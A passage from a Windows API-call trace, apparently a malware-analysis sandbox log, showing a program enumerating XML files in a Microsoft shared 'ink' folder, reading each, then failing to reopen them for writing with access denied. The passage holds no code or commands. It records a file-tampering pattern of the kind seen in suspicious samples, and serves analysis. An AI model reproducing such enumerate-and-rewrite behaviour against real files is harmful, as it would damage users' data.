| out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml") returned 62 [0084.798] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.798] GetFileType (hFile=0x364) returned 0x1 [0084.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0084.799] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.799] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.799] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.799] CloseHandle (hObject=0x364) returned 1 [0084.799] AreFileApisANSI () returned 1 [0084.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e360 [0084.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e360, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml") returned 62 [0084.799] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.799] GetLastError () returned 0x5 [0084.799] GetLastError () returned 0x5 [0084.800] SetLastError (dwErrCode=0x5) [0084.800] GetLastError () returned 0x5 [0084.800] SetLastError (dwErrCode=0x5) [0084.800] GetLastError () returned 0x5 [0084.800] SetLastError (dwErrCode=0x5) [0084.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0084.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0084.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0084.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.800] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa08, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipssrb.xml", cAlternateFileName="")) returned 1 [0084.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0084.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0084.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0084.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0084.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0084.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0084.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0084.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0084.801] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.801] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.801] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.801] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0084.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.801] AreFileApisANSI () returned 1 [0084.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml", lpUsedDefaultChar=0x0) returned 62 [0084.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0084.801] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.801] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0084.801] AreFileApisANSI () returned 1 [0084.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6df20 [0084.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml") returned 62 [0084.801] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.801] GetFileType (hFile=0x364) returned 0x1 [0084.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0084.802] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.802] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.802] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.802] CloseHandle (hObject=0x364) returned 1 [0084.802] AreFileApisANSI () returned 1 [0084.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6eb58 [0084.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6eb58, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml") returned 62 [0084.802] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.802] GetLastError () returned 0x5 [0084.802] GetLastError () returned 0x5 [0084.803] SetLastError (dwErrCode=0x5) [0084.803] GetLastError () returned 0x5 [0084.803] SetLastError (dwErrCode=0x5) [0084.803] GetLastError () returned 0x5 [0084.803] SetLastError (dwErrCode=0x5) [0084.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0084.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0084.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0084.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.803] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa24, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipssrl.xml", cAlternateFileName="")) returned 1 [0084.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0084.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0084.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0084.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0084.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0084.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0084.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0084.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.804] AreFileApisANSI () returned 1 [0084.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml", lpUsedDefaultChar=0x0) returned 62 [0084.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0084.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0084.804] AreFileApisANSI () returned 1 [0084.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6df20 [0084.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml") returned 62 [0084.804] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.805] GetFileType (hFile=0x364) returned 0x1 [0084.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0084.805] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.805] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.805] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.805] CloseHandle (hObject=0x364) returned 1 [0084.806] AreFileApisANSI () returned 1 [0084.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e1c8 [0084.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6e1c8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml") returned 62 [0084.806] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.806] GetLastError () returned 0x5 [0084.806] GetLastError () returned 0x5 [0084.806] SetLastError (dwErrCode=0x5) [0084.806] GetLastError () returned 0x5 [0084.806] SetLastError (dwErrCode=0x5) [0084.806] GetLastError () returned 0x5 [0084.806] SetLastError (dwErrCode=0x5) [0084.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0084.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0084.806] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.806] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.806] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9d8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipssve.xml", cAlternateFileName="")) returned 1 [0084.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0084.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0084.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0084.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0084.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0084.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0084.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0084.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0084.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.807] AreFileApisANSI () returned 1 [0084.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml", lpUsedDefaultChar=0x0) returned 62 [0084.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0084.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0084.807] AreFileApisANSI () returned 1 [0084.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6eb58 [0084.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6eb58, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml") returned 62 [0084.807] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.808] GetFileType (hFile=0x364) returned 0x1 [0084.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 